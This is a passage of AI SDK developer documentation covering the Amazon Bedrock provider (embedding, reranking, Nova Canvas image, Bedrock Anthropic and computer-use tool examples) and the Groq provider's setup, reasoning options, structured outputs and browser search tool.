| `us.anthropic.claude-opus-4-20250514-v1:0` | | | | |
| `us.anthropic.claude-opus-4-1-20250805-v1:0` | | | | |
| `us.anthropic.claude-3-5-sonnet-20241022-v2:0` | | | | |
| `us.anthropic.claude-3-5-sonnet-20240620-v1:0` | | | | |
| `us.anthropic.claude-3-sonnet-20240229-v1:0` | | | | |
| `us.anthropic.claude-3-opus-20240229-v1:0` | | | | |
| `us.anthropic.claude-3-haiku-20240307-v1:0` | | | | |
| `anthropic.claude-v2` | | | | |
| `anthropic.claude-v2:1` | | | | |
| `anthropic.claude-instant-v1` | | | | |
| `cohere.command-text-v14` | | | | |
| `cohere.command-light-text-v14` | | | | |
| `cohere.command-r-v1:0` | | | | |
| `cohere.command-r-plus-v1:0` | | | | |
| `us.deepseek.r1-v1:0` | | | | |
| `meta.llama3-8b-instruct-v1:0` | | | | |
| `meta.llama3-70b-instruct-v1:0` | | | | |
| `meta.llama3-1-8b-instruct-v1:0` | | | | |
| `meta.llama3-1-70b-instruct-v1:0` | | | | |
| `meta.llama3-1-405b-instruct-v1:0` | | | | |
| `meta.llama3-2-1b-instruct-v1:0` | | | | |
| `meta.llama3-2-3b-instruct-v1:0` | | | | |
| `meta.llama3-2-11b-instruct-v1:0` | | | | |
| `meta.llama3-2-90b-instruct-v1:0` | | | | |
| `us.meta.llama3-2-1b-instruct-v1:0` | | | | |
| `us.meta.llama3-2-3b-instruct-v1:0` | | | | |
| `us.meta.llama3-2-11b-instruct-v1:0` | | | | |
| `us.meta.llama3-2-90b-instruct-v1:0` | | | | |
| `us.meta.llama3-1-8b-instruct-v1:0` | | | | |
| `us.meta.llama3-1-70b-instruct-v1:0` | | | | |
| `us.meta.llama3-3-70b-instruct-v1:0` | | | | |
| `us.meta.llama4-scout-17b-instruct-v1:0` | | | | |
| `us.meta.llama4-maverick-17b-instruct-v1:0` | | | | |
| `mistral.mistral-7b-instruct-v0:2` | | | | |
| `mistral.mixtral-8x7b-instruct-v0:1` | | | | |
| `mistral.mistral-large-2402-v1:0` | | | | |
| `mistral.mistral-small-2402-v1:0` | | | | |
| `us.mistral.pixtral-large-2502-v1:0` | | | | |
| `openai.gpt-oss-120b-1:0` | | | | |
| `openai.gpt-oss-20b-1:0` | | | | |
Embedding Models
You can create models that call the Bedrock API using the `.embedding()` factory method.
const model = bedrock.embedding('amazon.titan-embed-text-v1');
Bedrock Titan embedding model amazon.titan-embed-text-v2:0 supports several additional settings. You can pass them as an options argument:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';
const model = bedrock.embedding('amazon.titan-embed-text-v2:0');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
bedrock: {
dimensions: 512, // optional, number of dimensions for the embedding
normalize: true, // optional, normalize the output embeddings
} satisfies AmazonBedrockEmbeddingModelOptions,
},
});
The following optional provider options are available for Bedrock Titan embedding models:
- `dimensions` *number*
  The number of dimensions the output embeddings should have. The following values are accepted: 1024 (default), 512, 256.
- `normalize` *boolean*
  Flag indicating whether or not to normalize the output embeddings. Defaults to `true`.
Nova Embedding Models
Amazon Nova embedding models support additional provider options:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';
const { embedding } = await embed({
model: bedrock.embedding('amazon.nova-embed-text-v2:0'),
value: 'sunny day at the beach',
providerOptions: {
bedrock: {
embeddingDimension: 1024, // optional, number of dimensions
embeddingPurpose: 'TEXT_RETRIEVAL', // optional, purpose of embedding
truncate: 'END', // optional, truncation behavior
} satisfies AmazonBedrockEmbeddingModelOptions,
},
});
The following optional provider options are available for Nova embedding models:
- `embeddingDimension` *number*
  The number of dimensions for the output embeddings. Supported values: 256, 384, 1024 (default), 3072.
- `embeddingPurpose` *string*
  The purpose of the embedding. Accepts: `GENERIC_INDEX` (default), `TEXT_RETRIEVAL`, `IMAGE_RETRIEVAL`, `VIDEO_RETRIEVAL`, `DOCUMENT_RETRIEVAL`, `AUDIO_RETRIEVAL`, `GENERIC_RETRIEVAL`, `CLASSIFICATION`, `CLUSTERING`.
- `truncate` *string*
  Truncation behavior when input exceeds the model's context length. Accepts: `NONE`, `START`, `END` (default).
Cohere Embedding Models
Cohere embedding models on Bedrock require an inputType and support truncation:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';
const { embedding } = await embed({
model: bedrock.embedding('cohere.embed-english-v3'),
value: 'sunny day at the beach',
providerOptions: {
bedrock: {
inputType: 'search_document', // required for Cohere
truncate: 'END', // optional, truncation behavior
} satisfies AmazonBedrockEmbeddingModelOptions,
},
});
The following provider options are available for Cohere embedding models:
- `inputType` *string*
  Input type for Cohere embedding models. Accepts: `search_document`, `search_query` (default), `classification`, `clustering`.
- `truncate` *string*
  Truncation behavior when input exceeds the model's context length. Accepts: `NONE`, `START`, `END`.
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| `amazon.titan-embed-text-v1` | 1536 | |
| `amazon.titan-embed-text-v2:0` | 1024 | |
| `amazon.nova-embed-text-v2:0` | 1024 | |
| `cohere.embed-english-v3` | 1024 | |
| `cohere.embed-multilingual-v3` | 1024 | |
Reranking Models
You can create models that call the Bedrock Rerank API
using the .reranking() factory method.
const model = bedrock.reranking('cohere.rerank-v3-5:0');
You can use Amazon Bedrock reranking models to rerank documents with the rerank function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { rerank } from 'ai';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: bedrock.reranking('cohere.rerank-v3-5:0'),
documents,
query: 'talk about rain',
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Amazon Bedrock reranking models support additional provider options that can be passed via providerOptions.bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: bedrock.reranking('cohere.rerank-v3-5:0'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
providerOptions: {
bedrock: {
nextToken: 'pagination_token_here',
},
},
});
The following provider options are available:
- `nextToken` *string*
  Token for pagination of results.
- `additionalModelRequestFields` *Record<string, unknown>*
  Additional model-specific request fields.
Model Capabilities
| Model |
|---|
| `amazon.rerank-v1:0` |
| `cohere.rerank-v3-5:0` |
Image Models
You can create models that call the Bedrock API using the `.image()` factory method.
For more on the Amazon Nova Canvas image model, see the Nova Canvas Overview.
const model = bedrock.image('amazon.nova-canvas-v1:0');
You can then generate images with the generateImage function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
});
You can also pass the providerOptions object to the generateImage function to customize the generation behavior:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
providerOptions: {
bedrock: {
quality: 'premium',
negativeText: 'blurry, low quality',
cfgScale: 7.5,
style: 'PHOTOREALISM',
},
},
});
The following optional provider options are available for Amazon Nova Canvas:
- `quality` *string*
  The quality level for image generation. Accepts `'standard'` or `'premium'`.
- `negativeText` *string*
  Text describing what you don't want in the generated image.
- `cfgScale` *number*
  Controls how closely the generated image adheres to the prompt. Higher values result in images that are more closely aligned to the prompt.
- `style` *string*
  Predefined visual style for image generation. Accepts one of: `3D_ANIMATED_FAMILY_FILM`, `DESIGN_SKETCH`, `FLAT_VECTOR_ILLUSTRATION`, `GRAPHIC_NOVEL_ILLUSTRATION`, `MAXIMALISM`, `MIDCENTURY_RETRO`, `PHOTOREALISM`, `SOFT_DIGITAL_PAINTING`.
Documentation for additional settings can be found within the Amazon Bedrock User Guide for Amazon Nova Documentation.
Image Editing
Amazon Nova Canvas supports several image editing task types. When you provide input images via prompt.images, the model automatically detects the appropriate editing mode, or you can explicitly specify the taskType in provider options.
Image Variation
Create variations of an existing image while maintaining its core characteristics:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
text: 'Modernize the style, photo-realistic, 8k, hdr',
images: [imageBuffer],
},
providerOptions: {
bedrock: {
taskType: 'IMAGE_VARIATION',
similarityStrength: 0.7, // 0-1, higher = closer to original
negativeText: 'bad quality, low resolution',
},
},
});
- `similarityStrength` *number*
  Controls how similar the output is to the input image. Values range from 0 to 1, where higher values produce results closer to the original.
Inpainting
Edit specific parts of an image. You can define the area to modify using either a mask image or a text prompt:
Using a mask prompt (text-based selection):
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
text: 'a cute corgi dog in the same style',
images: [imageBuffer],
},
providerOptions: {
bedrock: {
maskPrompt: 'cat', // Describe what to replace
},
},
seed: 42,
});
Using a mask image:
const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // White pixels = area to change
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask: mask,
},
});
- `maskPrompt` *string*
  A text description of the area to modify. The model will automatically identify and mask the described region.
Outpainting
Extend an image beyond its original boundaries:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
text: 'A beautiful sunset landscape with mountains',
images: [imageBuffer],
},
providerOptions: {
bedrock: {
taskType: 'OUTPAINTING',
maskPrompt: 'background',
outPaintingMode: 'DEFAULT', // or 'PRECISE'
},
},
});
- `outPaintingMode` *string*
  Controls how the outpainting is performed. Accepts `'DEFAULT'` or `'PRECISE'`.
Background Removal
Remove the background from an image:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
images: [imageBuffer],
},
providerOptions: {
bedrock: {
taskType: 'BACKGROUND_REMOVAL',
},
},
});
Image Editing Provider Options
The following additional provider options are available for image editing:
- `taskType` *string*
  Explicitly set the editing task type. Accepts `'TEXT_IMAGE'` (default for text-only), `'IMAGE_VARIATION'`, `'INPAINTING'`, `'OUTPAINTING'`, or `'BACKGROUND_REMOVAL'`. When images are provided without an explicit `taskType`, the model defaults to `'IMAGE_VARIATION'` (or `'INPAINTING'` if a mask is provided).
- `maskPrompt` *string*
  Text description of the area to modify (for inpainting/outpainting). Alternative to providing a mask image.
- `similarityStrength` *number*
  For `IMAGE_VARIATION`: Controls similarity to the original (0-1).
- `outPaintingMode` *string*
  For `OUTPAINTING`: Controls the outpainting behavior (`'DEFAULT'` or `'PRECISE'`).
Image Model Settings
You can customize the generation behavior with optional settings:
await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
maxImagesPerCall: 1, // Maximum number of images to generate per API call
});
- `maxImagesPerCall` *number*
  Override the maximum number of images generated per API call. Default can vary by model, with 5 as a common default.
Model Capabilities
The Amazon Nova Canvas model supports custom sizes with constraints as follows:
- Each side must be between 320-4096 pixels, inclusive.
- Each side must be evenly divisible by 16.
- The aspect ratio must be between 1:4 and 4:1. That is, one side can't be more than 4 times longer than the other side.
- The total pixel count must be less than 4,194,304.
For more, see Image generation access and usage.
| Model | Sizes |
|---|---|
| `amazon.nova-canvas-v1:0` | Custom sizes: 320-4096px per side (must be divisible by 16), aspect ratio 1:4 to 4:1, max 4.2M pixels |
Response Headers
The Amazon Bedrock provider returns the response headers associated with network requests made to the Bedrock servers.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
console.log(result.response.headers);
Below is sample output where you can see the x-amzn-requestid header. This can
be useful for correlating Bedrock API calls with requests made by the AI SDK:
{
connection: 'keep-alive',
'content-length': '2399',
'content-type': 'application/json',
date: 'Fri, 07 Feb 2025 04:28:30 GMT',
'x-amzn-requestid': 'c9f3ace4-dd5d-49e5-9807-39aedfa47c8e'
}
This information is also available with streamText:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const result = streamText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log('Response headers:', (await result.response).headers);
With sample output as:
{
connection: 'keep-alive',
'content-type': 'application/vnd.amazon.eventstream',
date: 'Fri, 07 Feb 2025 04:33:37 GMT',
'transfer-encoding': 'chunked',
'x-amzn-requestid': 'a976e3fc-0e45-4241-9954-b9bdd80ab407'
}
Bedrock Anthropic Provider Usage
The Bedrock Anthropic provider offers support for Anthropic's Claude models through Amazon Bedrock's native InvokeModel API. This provides full feature parity with the Anthropic API, including features that may not be available through the Converse API (such as stop_sequence in streaming responses).
For more information on Claude models available on Amazon Bedrock, see Claude on Amazon Bedrock.
Provider Instance
You can import the default provider instance bedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic:
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
If you need a customized setup, you can import createBedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic and create a provider instance with your settings:
import { createBedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
const bedrockAnthropic = createBedrockAnthropic({
region: 'us-east-1', // optional
accessKeyId: 'xxxxxxxxx', // optional
secretAccessKey: 'xxxxxxxxx', // optional
sessionToken: 'xxxxxxxxx', // optional
});
Provider Settings
You can use the following optional settings to customize the Bedrock Anthropic provider instance:
- `region` *string*
  The AWS region that you want to use for the API calls. It uses the `AWS_REGION` environment variable by default.
- `accessKeyId` *string*
  The AWS access key ID that you want to use for the API calls. It uses the `AWS_ACCESS_KEY_ID` environment variable by default.
- `secretAccessKey` *string*
  The AWS secret access key that you want to use for the API calls. It uses the `AWS_SECRET_ACCESS_KEY` environment variable by default.
- `sessionToken` *string*
  Optional. The AWS session token that you want to use for the API calls. It uses the `AWS_SESSION_TOKEN` environment variable by default.
- `apiKey` *string*
  API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the `AWS_BEARER_TOKEN_BEDROCK` environment variable by default.
- `baseURL` *string*
  Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
- `headers` *Resolvable<Record<string, string | undefined>>*
  Headers to include in the requests.
- `fetch` *(input: RequestInfo, init?: RequestInit) => Promise<Response>*
  Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- `credentialProvider` *() => PromiseLike<BedrockCredentials>*
  The AWS credential provider to use for the Bedrock provider to get dynamic credentials similar to the AWS SDK. Setting a provider here will cause its credential values to be used instead of the `accessKeyId`, `secretAccessKey`, and `sessionToken` settings.
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. us.anthropic.claude-3-5-sonnet-20241022-v2:0.
const model = bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0');
You can use Bedrock Anthropic language models to generate text with the generateText function:
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Provider Options
The following optional provider options are available for Bedrock Anthropic models:
- `metadata` *object*
  Optional. Metadata to include with the request. See the Anthropic API documentation for details.
  - `userId` *string*: An external identifier for the end-user.
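For example, a short sketch that attaches an end-user identifier via the `metadata` option (the `userId` value here is illustrative):
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    anthropic: {
      // External identifier for the end-user making this request.
      metadata: { userId: 'user-123' },
    },
  },
});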
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
messages: [
{
role: 'system',
content: 'You are an expert assistant.',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'user',
content: 'Explain quantum computing.',
},
],
});
Computer Use
The Bedrock Anthropic provider supports Anthropic's computer use tools:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
Bash Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
tools: {
bash: bedrockAnthropic.tools.bash_20241022({
execute: async ({ command }) => {
// Implement your bash command execution logic here
return [{ type: 'text', text: `Executed: ${command}` }];
},
}),
},
prompt: 'List the files in my directory.',
stopWhen: stepCountIs(2),
});
Text Editor Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
tools: {
str_replace_editor: bedrockAnthropic.tools.textEditor_20241022({
execute: async ({ command, path, old_str, new_str, insert_text }) => {
// Implement your text editing logic here
return 'File updated successfully';
},
}),
},
prompt: 'Update my README file.',
stopWhen: stepCountIs(5),
});
Computer Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
import fs from 'fs';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
tools: {
computer: bedrockAnthropic.tools.computer_20241022({
displayWidthPx: 1024,
displayHeightPx: 768,
execute: async ({ action, coordinate, text }) => {
if (action === 'screenshot') {
return {
type: 'image',
data: fs.readFileSync('./screenshot.png').toString('base64'),
};
}
return `executed ${action}`;
},
toModelOutput({ output }) {
return {
type: 'content',
value: [
typeof output === 'string'
? { type: 'text', text: output }
: {
type: 'image-data',
data: output.data,
mediaType: 'image/png',
},
],
};
},
}),
},
prompt: 'Take a screenshot.',
stopWhen: stepCountIs(3),
});
Reasoning
Anthropic has reasoning support for Claude 3.7 and Claude 4 models on Bedrock, including:
- `us.anthropic.claude-opus-4-7`
- `us.anthropic.claude-opus-4-6-v1`
- `us.anthropic.claude-opus-4-5-20251101-v1:0`
- `us.anthropic.claude-sonnet-4-5-20250929-v1:0`
- `us.anthropic.claude-opus-4-20250514-v1:0`
- `us.anthropic.claude-sonnet-4-20250514-v1:0`
- `us.anthropic.claude-opus-4-1-20250805-v1:0`
- `us.anthropic.claude-haiku-4-5-20251001-v1:0`
You can enable it using the thinking provider option and specifying a thinking budget in tokens.
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
},
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Computer Use | Reasoning |
|---|---|---|---|---|---|
| `us.anthropic.claude-opus-4-7` | | | | | |
| `us.anthropic.claude-opus-4-6-v1` | | | | | |
| `us.anthropic.claude-opus-4-5-20251101-v1:0` | | | | | |
| `us.anthropic.claude-sonnet-4-5-20250929-v1:0` | | | | | |
| `us.anthropic.claude-opus-4-20250514-v1:0` | | | | | |
| `us.anthropic.claude-sonnet-4-20250514-v1:0` | | | | | |
| `us.anthropic.claude-opus-4-1-20250805-v1:0` | | | | | |
| `us.anthropic.claude-haiku-4-5-20251001-v1:0` | | | | | |
| `us.anthropic.claude-3-5-sonnet-20241022-v2:0` | | | | | |
Migrating to @ai-sdk/amazon-bedrock 2.x
The Amazon Bedrock provider was rewritten in version 2.x to remove the
dependency on the @aws-sdk/client-bedrock-runtime package.
The `bedrockOptions` provider setting previously available has been removed. If
you were using the `bedrockOptions` object, you should now use the `region`,
`accessKeyId`, `secretAccessKey`, and `sessionToken` settings directly instead.
Note that you may need to set all of these explicitly, e.g. even if you're not
using `sessionToken`, set it to `undefined`. If you're running in a serverless
environment, your containing environment may set default environment variables
that the Amazon Bedrock provider will pick up, which could conflict with the
ones you intend to use.
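For example, a minimal sketch of the direct settings described above, with `sessionToken` set explicitly even though it is unused:
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
const bedrock = createAmazonBedrock({
  region: process.env.AWS_REGION,
  accessKeyId: process.env.AWS_ACCESS_KEY_ID,
  secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  sessionToken: undefined, // set explicitly to avoid picking up ambient values
});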
---
title: Groq
description: Learn how to use Groq.
---
Groq Provider
The Groq provider contains language model support for the Groq API.
Setup
The Groq provider is available via the @ai-sdk/groq module.
You can install it with `pnpm add @ai-sdk/groq` (or the equivalent command for npm, yarn, or bun).
Provider Instance
You can import the default provider instance groq from @ai-sdk/groq:
import { groq } from '@ai-sdk/groq';
If you need a customized setup, you can import createGroq from @ai-sdk/groq
and create a provider instance with your settings:
import { createGroq } from '@ai-sdk/groq';
const groq = createGroq({
// custom settings
});
You can use the following optional settings to customize the Groq provider instance:
- `baseURL` *string*
  Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://api.groq.com/openai/v1`.
- `apiKey` *string*
  API key that is being sent using the `Authorization` header. It defaults to the `GROQ_API_KEY` environment variable.
- `headers` *Record<string,string>*
  Custom headers to include in the requests.
- `fetch` *(input: RequestInfo, init?: RequestInit) => Promise<Response>*
  Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create Groq models using a provider instance.
The first argument is the model id, e.g. gemma2-9b-it.
const model = groq('gemma2-9b-it');
Reasoning Models
Groq offers several reasoning models such as `qwen-qwq-32b` and `deepseek-r1-distill-llama-70b`.
You can configure how the reasoning is exposed in the generated text by using the `reasoningFormat` option.
It supports the options `parsed`, `hidden`, and `raw`.
import { groq, type GroqLanguageModelOptions } from '@ai-sdk/groq';
import { generateText } from 'ai';
const result = await generateText({
model: groq('qwen/qwen3-32b'),
providerOptions: {
groq: {
reasoningFormat: 'parsed',
reasoningEffort: 'default',
parallelToolCalls: true, // Enable parallel function calling (default: true)
user: 'user-123', // Unique identifier for end-user (optional)
serviceTier: 'flex', // Use flex tier for higher throughput (optional)
} satisfies GroqLanguageModelOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
The following optional provider options are available for Groq language models:
- `reasoningFormat` *'parsed' | 'raw' | 'hidden'*
  Controls how reasoning is exposed in the generated text. Only supported by reasoning models like `qwen-qwq-32b` and `deepseek-r1-distill-*` models. For a complete list of reasoning models and their capabilities, see Groq's reasoning models documentation.
- `reasoningEffort` *'low' | 'medium' | 'high' | 'none' | 'default'*
  Controls the level of effort the model will put into reasoning.
  - `qwen/qwen3-32b` — supported values: `none` (disable reasoning; the model will not use any reasoning tokens) and `default` (enable reasoning). Defaults to `default` for `qwen/qwen3-32b`.
  - `gpt-oss-20b` / `gpt-oss-120b` — supported values: `low`, `medium`, and `high` (the level of reasoning effort to use).
- `structuredOutputs` *boolean*
  Whether to use structured outputs. Defaults to `true`. When enabled, object generation will use the `json_schema` format instead of the `json_object` format, providing more reliable structured outputs.
- `strictJsonSchema` *boolean*
  Whether to use strict JSON schema validation. When `true`, the model uses constrained decoding to guarantee schema compliance. Defaults to `true`. Only used when `structuredOutputs` is enabled and a schema is provided. See Groq's Structured Outputs documentation for details on strict mode limitations.
- `parallelToolCalls` *boolean*
  Whether to enable parallel function calling during tool use. Defaults to `true`.
- `user` *string*
  A unique identifier representing your end-user, which can help with monitoring and abuse detection.
- `serviceTier` *'on_demand' | 'performance' | 'flex' | 'auto'*
  Service tier for the request. Defaults to `'on_demand'`.
  - `'on_demand'`: Default tier with consistent performance and fairness.
  - `'performance'`: Prioritized tier for latency-sensitive workloads.
  - `'flex'`: Higher throughput tier (10x rate limits) optimized for workloads that can handle occasional request failures.
  - `'auto'`: Uses on_demand rate limits first, then falls back to the flex tier if exceeded.
  For more details about service tiers and their benefits, see Groq's service tiers documentation.

Only Groq reasoning models support the `reasoningFormat` option.
Structured Outputs
Structured outputs are enabled by default for Groq models.
You can disable them by setting the structuredOutputs option to false.
import { groq } from '@ai-sdk/groq';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: groq('moonshotai/kimi-k2-instruct-0905'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a simple pasta recipe.',
});
console.log(JSON.stringify(result.output, null, 2));
You can disable structured outputs for models that don't support them:
import { groq, type GroqLanguageModelOptions } from '@ai-sdk/groq';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: groq('gemma2-9b-it'),
providerOptions: {
groq: {
structuredOutputs: false,
} satisfies GroqLanguageModelOptions,
},
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a simple pasta recipe in JSON format.',
});
console.log(JSON.stringify(result.output, null, 2));
Example
You can use Groq language models to generate text with the generateText function:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const { text } = await generateText({
model: groq('gemma2-9b-it'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Image Input
Groq's multi-modal models like meta-llama/llama-4-scout-17b-16e-instruct support image inputs. You can include images in your messages using either URLs or base64-encoded data:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const { text } = await generateText({
model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What do you see in this image?' },
{
type: 'image',
image: 'https://example.com/image.jpg',
},
],
},
],
});
You can also use base64-encoded images:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
import { readFileSync } from 'fs';
const imageData = readFileSync('path/to/image.jpg', 'base64');
const { text } = await generateText({
model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe this image in detail.' },
{
type: 'image',
image: `data:image/jpeg;base64,${imageData}`,
},
],
},
],
});
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| `gemma2-9b-it` | | | | |
| `llama-3.1-8b-instant` | | | | |
| `llama-3.3-70b-versatile` | | | | |
| `meta-llama/llama-guard-4-12b` | | | | |
| `deepseek-r1-distill-llama-70b` | | | | |
| `meta-llama/llama-4-maverick-17b-128e-instruct` | | | | |
| `meta-llama/llama-4-scout-17b-16e-instruct` | | | | |
| `meta-llama/llama-prompt-guard-2-22m` | | | | |
| `meta-llama/llama-prompt-guard-2-86m` | | | | |
| `moonshotai/kimi-k2-instruct-0905` | | | | |
| `qwen/qwen3-32b` | | | | |
| `llama-guard-3-8b` | | | | |
| `llama3-70b-8192` | | | | |
| `llama3-8b-8192` | | | | |
| `mixtral-8x7b-32768` | | | | |
| `qwen-qwq-32b` | | | | |
| `qwen-2.5-32b` | | | | |
| `deepseek-r1-distill-qwen-32b` | | | | |
| `openai/gpt-oss-20b` | | | | |
| `openai/gpt-oss-120b` | | | | |
Browser Search Tool
Groq provides a browser search tool that offers interactive web browsing capabilities. Unlike traditional web search, browser search navigates websites interactively, providing more detailed and comprehensive results.
Supported Models
Browser search is only available for these specific models:
- `openai/gpt-oss-20b`
- `openai/gpt-oss-120b`
Basic Usage
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const result = await generateText({
model: groq('openai/gpt-oss-120b'), // Must use supported model
prompt:
'What are the latest developments in AI? Please search for recent news.',
tools: {
browser_search: groq.tools.browserSearch({}),
},
toolChoice: 'required', // Ensure the tool is used
});
console.log(result.text);
Streaming Example
import { groq } from '@ai-sdk/groq';
import { streamText } from 'ai';
const result = streamText({
model: groq('openai/gpt-oss-120b'),
prompt: 'Search for the latest tech news and summarize it.',
tools: {
browser_search: groq.tools.browserSearch({}),
},
toolChoice: 'required',
});
for await (const delta of result.fullStream) {
if (delta.type === 'text-delta') {
process.stdout.write(delta.text);
}
}
Key Features
- Interactive Browsing: Navigates websites like a human user
- Comprehensive Results: More detailed than traditional search snippets
- Server-side Execution: Runs on Groq's infrastructure, no setup required
- Powered by Exa: Uses Exa search engine for optimal results
